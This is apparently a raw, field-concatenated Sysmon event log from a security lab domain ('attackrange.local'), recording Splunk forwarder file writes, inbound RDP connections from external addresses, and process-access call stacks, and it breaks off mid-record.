23542300x80000000000000001047598Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:39.264{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0151824DA34C4F6BFD56F5858188C476,SHA256=A8E24EE9E3FA1B7AA7C609643623BB5FBA987D0F766C65B63D3D54054D22510A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047597Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:39.164{5EBD8912-7F30-614D-1200-00000000FC01}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=2EA2251915F5C0845B43BABAB3019769,SHA256=8AD4648D657EFE816FF7B66AF2A086950ABB8C69F3718A6224109AB2C1E122FC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047596Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:37.078{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50868-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001047601Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:40.926{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B171FF1E45D889EBAAFB083B12F7506,SHA256=BF7410AB0E2E5DE1E88632C412A66455546DC9F4E61AE8C93D1BC67600DE200C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976173Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:37.219{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-16010-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976172Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:40.031{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97CE4A27CB9F0C8730CF916F7DDEBE66,SHA256=9AA5C26BCB8181428FE2A782DEECBE5AEF4935E9F1ED5D69A0D0E0DBC862262C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047600Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:37.822{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse39.101.135.90-59772-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001047602Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:41.946{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6149CD4FB0CF23A926A559AE2ED6FCB9,SHA256=C552BCFB641A6BBF4DE20FA39D8E28008AC5175CF5B5B2D9CB0A722278E823F1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976175Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:38.815{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59239-false10.0.1.12-8000- 23542300x8000000000000000976174Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:41.047{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=607451BABCD3C0A32E2BA4DFB8B3FA43,SHA256=08A28FBAF2EE0D17F20B5639626D85B3F584AEAF3BEE206BF7A99E6AD6E18EA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047604Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:42.965{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=46489CC13785A1A3825B09A6CDE3656D,SHA256=49A302F6A5FA2EFBA411BD23151612343C1BB092CF989C2D7195EEAB60EBFF68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047603Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:42.965{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E38A3E2F11832AF5F6AA8964412DA42F,SHA256=FE35485579DC6F741BB9F19BA9C58AB3A0DB3C3F0961288E520900C5A144C84A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976177Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:42.343{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8B27AF1374670769C32A29C711DF728E,SHA256=888C29B4063D1B3A19F6AA164D23949C7351E325AAC5E6A5E056D85754567A9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976176Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:42.062{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10CA954A1BC2D18F865CE8B3C12A7B90,SHA256=053B2AFA2E2208F311582FC42364917A17FB7D19F6A267AC4075FC86AAF0010A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047607Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:43.980{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62E8866F591403C1864F71DF7D8ACD46,SHA256=0FA9D98C56E0FB21036BCFAD9162670E9ACFD51020BF07C0F75C1015F57682E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047606Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:41.701{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com50950-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001047605Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:41.342{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-65069-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000976179Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:43.807{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=49CD77B96C83944B89F901DB37762E7C,SHA256=F683874FED20BA32DB0D58CD11B72CF809EC63A785DB79A4F5FCC759ABB6DA51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976178Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:43.073{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC86A64A5F62D8D3BE69D61A713700D1,SHA256=C9653DCF730614526BE5BBF50CAEB5DD554A1D259D7C45C0DDCB463DCC3D7B0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976181Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:44.073{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4894F6D0635E9F20FBB02F0BC0A2F7ED,SHA256=723F3A9A542D16955DBA419A4E2942372F99F954030E9A419CCD4B1FB71E791A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047618Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:44.927{5EBD8912-8800-6151-DE79-00000000FC01}48607016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047617Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:44.765{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8800-6151-DE79-00000000FC01}4860C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047616Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:44.765{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047615Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:44.765{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047614Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:44.765{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047613Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:44.765{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047612Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:44.765{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8800-6151-DE79-00000000FC01}4860C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047611Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:44.765{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8800-6151-DE79-00000000FC01}4860C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047610Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:44.747{5EBD8912-8800-6151-DE79-00000000FC01}4860C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047609Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:44.480{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=328420F375BCAA341D020D35309FDD2A,SHA256=963757005956C5B89F26AB148659452C755355B46C0DD910C1B591E2289F7539,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047608Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:41.737{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49198-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000976180Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:40.517{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com50722-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976185Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:45.326{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4296MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976184Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:45.152{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B6141BAA364BC1E6975005FBEA5298E9,SHA256=478798054E2C7B6B0557514A62429FE935404B72108373EE58F060D960496D38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976183Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:45.074{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B07BE56189DA263FA8AF70A93156E6F,SHA256=9DC6DC583654256A926262593C896814F63A2AA4F76EE2EE6B05DB39A6DD6EF9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976182Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:42.461{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-50662-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001047628Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:45.726{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=25FA5DF64C5115B2A68AB0CDEA9CE423,SHA256=BBFCD4368CDFE17FF3C4CEC2D5186FC9FEA40E44D1BF9EBC3EEDE6DB607EB575,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047627Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:45.448{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8801-6151-DF79-00000000FC01}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047626Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:45.448{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047625Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:45.448{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047624Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:45.448{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8801-6151-DF79-00000000FC01}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047623Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:45.448{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047622Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 